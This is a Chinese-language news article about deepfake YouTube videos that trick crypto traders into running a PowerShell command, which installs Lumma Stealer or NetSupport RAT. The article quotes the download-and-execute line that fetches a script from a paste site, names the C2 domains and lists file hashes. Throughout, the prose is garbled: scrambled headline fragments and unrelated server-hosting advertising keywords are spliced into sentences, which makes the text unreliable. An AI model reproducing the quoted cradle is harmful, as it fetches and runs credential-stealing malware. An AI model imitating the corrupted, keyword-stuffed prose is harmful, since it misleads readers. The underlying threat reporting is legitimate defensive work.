警惕！利用AI深度伪造视频的新型“自骗”攻击浪潮来袭

近日 ，自骗一种名为“自骗”的警惕击浪新型攻击手段正在瞄准加密货币爱好者和金融交易者 。这种攻击利用AI生成的利用深度伪造（Deepfake）视频和恶意脚本，标志着社交工程技术的深度视频一次危险升级。网络安全公司Gen Digital的伪造研究人员发现，该攻击活动通过利用经过验证的型攻YouTube频道 、合成人物形象以及AI制作的潮袭恶意载荷
，高防服务器诱使受害者主动破坏自己的自骗系统。

攻击手段 ：深度伪造视频结合恶意脚本

这种攻击在2024年第三季度激增了614%，警惕击浪它结合了尖端的利用深度伪造技术和心理定制的诱饵，引发了人们对生成式AI在网络犯罪中被武器化的深度视频高度关注。攻击通常从一个托管在已被劫持的伪造YouTube频道上的深度伪造视频开始
，该频道拥有11万订阅者。源码库型攻视频中出现一个名为“Thomas Harris”或“Thomas Roberts”的潮袭合成人物形象，通过高级的自骗面部动画、语音合成和身体动作复制技术创建。

尽管该频道看似合法 ，甚至包含从TradingView转用的内容 ，但未公开的教程视频会指示观众激活一个虚构的“AI开发者模式” ，声称能够以97%的香港云服务器准确率预测加密货币市场趋势 。

从深度伪造到PowerShell恶意载荷

攻击的核心在于其使用AI生成的脚本 ，旨在绕过用户的怀疑。受害者被引导打开Windows的运行对话框（Win+R），并执行一个PowerShell命令，从Pastefy[.]com或Obin[.]net等粘贴分享网站获取恶意脚本 。

研究人员解密的一例代表性载荷显示，建站模板攻击者甚至使用ChatGPT优化了他们的代码：

复制`iex (New-Object Net.WebClient).DownloadString(hxxps://pastefy[.]com/raw/AbCdE123) `1.

该脚本连接到命令与控制（C&C）服务器（最近被追踪为developer-update[.]dev或developerbeta[.]dev）
，以部署Lumma Stealer或NetSupport远程访问工具
。

Lumma Stealer会窃取加密货币钱包和浏览器凭证，而NetSupport则授予攻击者对其系统的完全控制权  。取证分析揭示了关键组件的SHA-256哈希值 ，包括：

a5e0635363bbb5d22d5ffc32d9738665942abdd89d2e6bd1784d6a60ac521797（恶意PowerShell脚本）2fe60aa1db2cf7a1dc2b3629b4bbc843c703146f212e7495f4dc7745b3c5c59e（Lumma Stealer变种）

值得注意的是，深度伪造视频通过程序性细节隐藏其人工性质——合成声音会解释如何通过添加注册表排除项来绕过Windows Defender，服务器租用而屏幕上的按键操作则模仿了真实的TradingView工作流程 。

攻击者还通过YouTube的赞助广告系统扩大影响力，目标锁定在观看合法金融内容的用户 。与传统网络钓鱼不同
，受害者会积极参与到自身的攻击中 ，误以为自己在访问独家工具。随着网络犯罪分子现在能够自动化人物创建和脚本优化，云计算通过多种渠道验证数字指令已成为一项不可或缺的安全实践。